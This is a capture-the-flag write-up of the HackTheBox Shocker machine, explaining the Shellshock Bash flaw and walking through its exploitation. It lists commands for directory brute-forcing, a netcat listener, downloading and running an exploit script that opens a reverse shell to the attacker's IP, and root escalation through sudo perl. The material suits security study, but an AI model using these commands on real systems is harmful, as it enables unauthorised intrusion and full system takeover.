What Is Shellshock?

Shellshock was a major vulnerability that affected versions of Bash (the Bourne-Again Shell) before version 4.3. Bash is the command-line interface that many of us use to interact with Linux and Mac systems. The bug was particularly dangerous on web servers running Apache with CGI-bin scripts and on systems using OpenSSH.

The core of the problem was that an attacker could trick a vulnerable version of Bash into running arbitrary commands. In the context of a web server, this meant an attacker could send a specially crafted HTTP request and get the server to execute commands, leading to a full compromise.

The best way to fix this, of course, is to update Bash to a patched version and to be very careful about what scripts are running in your CGI-bin directory.

In this post, we covered the demonstration, exploitation and mitigation of The ShellShock Vulnerability. We used the lab material of HackTheBox Shocker.

The Live Hack

For my demonstration, I’m targeting a machine that’s running an Apache web server.

  1. Reconnaissance: I start with an Nmap scan and find that ports 80 (for HTTP) and 2222 (for SSH) are open. I then use a tool called dirb to look for hidden directories on the web server and quickly find a cgi-bin directory. A further search inside that directory reveals a Bash script named user.sh.
  2. Proof of Concept: Now that I have a target script, I need to see if it’s vulnerable. I use the curl command to send a specially crafted HTTP request to the script. My payload is a simple ping command that tries to ping my own machine. I fire up tcpdump on my end to listen for the incoming ping, but it doesn’t work.
  3. Getting a Shell: Since the ping didn’t work, I switch to a more direct approach: a reverse shell. I craft a new curl command, but this time, the payload is a one-liner that will create a reverse shell connection back to my machine. I start a Netcat listener on my end, send the request, and just like that, I get a shell on the target machine!
  4. Trying Another Way: Just to show there’s more than one way to do this, I also use a Python script called shocker.py that automates the Shellshock exploit. I download the script, run it with the target’s information, and get a second reverse shell.
  5. Privilege Escalation: Now that I’m in, I need to get root access. I run sudo -l to see what commands I can run with sudo. It turns out I can run perl as the root user without a password. This is a huge win! I use a simple perl command to execute a shell, and because I ran it with sudo, the shell I get is a root shell. 👑

From there, I can navigate to the /root directory and grab the final flag.

Technical Commands

Here’s a list of the commands I used in my terminal to exploit Shellshock and own this machine:

  • Directory Brute-forcing:
    • dirb http://10.10.10.56
    • dirb http://10.10.10.56/cgi-bin/ -X .py,.sh
  • Interacting with the Web Server:
    • curl http://10.10.10.56/cgi-bin/user.sh
  • Network Utilities:
    • ifconfig
    • sudo tcpdump -i tun0
    • nc -lvp 4545
  • Exploitation Scripts:
    • wget https://raw.githubusercontent.com/opsxcq/exploit-bashbug/master/shocker.py
    • python shocker.py -H 10.10.10.56 -u /cgi-bin/user.sh -l 10.10.14.7 -p 4546
  • Privilege Escalation:
    • id
    • sudo -l
    • sudo perl -e 'exec "/bin/bash";'
  • Basic Navigation:
    • ls, pwd, cd /root

Video Walk-Through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles